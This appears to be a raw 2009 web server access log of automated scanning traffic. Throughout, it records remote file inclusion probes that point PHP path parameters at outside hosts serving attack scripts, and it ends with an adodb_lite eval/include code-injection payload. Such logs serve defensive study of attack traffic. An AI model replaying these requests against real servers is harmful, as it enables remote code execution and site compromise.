222.122.79.200 - - [26/Jun/2009:23:55:43 -0500] "GET /logs/access_log.1236643200//admin/editor2/spaw_control.class.php?spaw_root=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.122.79.200 - - [26/Jun/2009:23:55:43 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.122.79.200 - - [26/Jun/2009:23:55:44 -0500] "GET /logs/access_log.1241827200//admin/editor2/spaw_control.class.php?spaw_root=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:23:57:20 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:23:57:20 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:23:57:20 -0500] "GET /?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:23:57:22 -0500] "GET /logs/?DOCUMENT_ROOT=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
217.125.38.117 - - [26/Jun/2009:23:58:23 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.125.38.117 - - [26/Jun/2009:23:58:24 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.125.38.117 - - [26/Jun/2009:23:58:27 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
217.125.38.117 - - [26/Jun/2009:23:59:49 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:00:00:01 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
60.251.217.4 - - [27/Jun/2009:00:00:21 -0500] "GET /logs/access_log.1240272000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:02:06 -0500] "GET //citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:02:06 -0500] "GET /logs/access_log.1240531200//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:02:06 -0500] "GET /logs//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:02:35 -0500] "GET /logs/access_log.1237939200//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:02:36 -0500] "GET /logs/access_log.1230163200//stubjambo.php?baseDir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:02:36 -0500] "GET //stubjambo.php?baseDir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:02:36 -0500] "GET /logs//stubjambo.php?baseDir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:02:50 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:02:50 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:02:50 -0500] "GET /logs/access_log.1236038400/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:02:54 -0500] "GET /logs/access_log.1230076800//stubjambo.php?baseDir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:02:56 -0500] "GET /logs/access_log.1239321600/convert/mvcw.php?step=1&vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:03:14 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:19 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:19 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:19 -0500] "GET /logs/access_log.1241913600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:28 -0500] "GET /logs/access_log.1241827200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:40 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:40 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:40 -0500] "GET /logs/access_log.1241913600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:04:51 -0500] "GET /logs/access_log.1241827200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:05:59 -0500] "GET /logs/access_log.1240358400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [27/Jun/2009:00:06:12 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [27/Jun/2009:00:06:12 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [27/Jun/2009:00:06:12 -0500] "GET /logs/access_log.1239926400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [27/Jun/2009:00:07:05 -0500] "GET /logs/access_log.1241913600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
91.9.231.139 - - [27/Jun/2009:00:07:12 -0500] "GET /index.php?meio.php=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:00:07:12 -0500] "GET /logs/index.php?meio.php=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:00:07:12 -0500] "GET /logs/access_log.1240012800/index.php?meio.php=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.9.231.139 - - [27/Jun/2009:00:07:13 -0500] "GET /logs/access_log.1239926400/index.php?meio.php=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:07:56 -0500] "GET /logs/access_log.1242000000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [27/Jun/2009:00:09:15 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.17.162.28 - - [27/Jun/2009:00:09:15 -0500] "GET /logs/access_log.1240358400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.17.162.28 - - [27/Jun/2009:00:09:15 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.17.162.28 - - [27/Jun/2009:00:09:21 -0500] "GET /logs/access_log.1239926400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.16.182.130 - - [27/Jun/2009:00:09:23 -0500] "GET /convert/mvcw.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:09:23 -0500] "GET /logs/access_log.1236038400/convert/mvcw.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:09:23 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:09:24 -0500] "GET /logs/access_log.1239321600/convert/mvcw.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:00:09:58 -0500] "GET /logs/access_log.1241913600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
85.17.162.28 - - [27/Jun/2009:00:11:00 -0500] "GET /logs/access_log.1242000000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.206.120.187 - - [27/Jun/2009:00:13:43 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:13:43 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:13:43 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.161 - - [27/Jun/2009:00:13:54 -0500] "GET /logs/access_log.1155254400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.161 - - [27/Jun/2009:00:13:54 -0500] "GET /logs/access_log.1201824000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.117 - - [27/Jun/2009:00:14:26 -0500] "GET /logs/access_log.1142812800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.28.116.226 - - [27/Jun/2009:00:22:05 -0500] "GET /logs/home.php?index=http://www.jujumar.com.br/admin/fckeditor/idv6.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
201.28.116.226 - - [27/Jun/2009:00:22:09 -0500] "GET /home.php?index=http://www.jujumar.com.br/admin/fckeditor/idv6.txt???? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
201.232.54.48 - - [27/Jun/2009:00:23:08 -0500] "GET ////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 200 3251 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:23:08 -0500] "GET /logs/access_log.1233619200////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:23:14 -0500] "GET /logs////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 200 194923 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:23:30 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:23:30 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:23:30 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:23:30 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:23:43 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:24:00 -0500] "GET /logs/access_log.1233619200////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:24:00 -0500] "GET ////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 200 3251 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:24:02 -0500] "GET /logs////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 200 194923 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:15 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:15 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:16 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:18 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:18 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:18 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:24:35 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:24:35 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:24:35 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:24:49 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:00:24:49 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:54 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:24:56 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:00:24:57 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:00:24:57 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:00:24:57 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:24:58 -0500] "GET /logs/access_log.1238889600////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:00:24:59 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:25:16 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:25:16 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:25:16 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:25:16 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:25:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:25:17 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:25:17 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:25:45 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:25:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:25:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:25:56 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:00:26:28 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
59.125.5.1 - - [27/Jun/2009:00:26:28 -0500] "GET /logs/access_log.1233878400/?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:26:37 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:26:37 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:26:37 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:26:37 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:26:40 -0500] "GET /logs/access_log.1238889600////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:27:12 -0500] "GET /logs/access_log.1241395200////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
163.17.8.18 - - [27/Jun/2009:00:27:12 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.17.8.18//ge/up1.gif?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:00:27:18 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
163.17.8.18 - - [27/Jun/2009:00:27:18 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.17.8.18//ge/up1.gif?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:00:27:32 -0500] "GET /logs/access_log.1241395200////////?DOCUMENT_ROOT=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
163.17.8.18 - - [27/Jun/2009:00:27:32 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://163.17.8.18//ge/up1.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:30:56 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:00:32:06 -0500] "GET /logs/access_log.1241308800///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:34:39 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:34:39 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.189.116.3 - - [27/Jun/2009:00:34:40 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:35:06 -0500] "GET /db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:35:06 -0500] "GET /logs/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:35:06 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
96.9.180.229 - - [27/Jun/2009:00:35:07 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:35:43 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:35:43 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
80.93.50.112 - - [27/Jun/2009:00:35:43 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
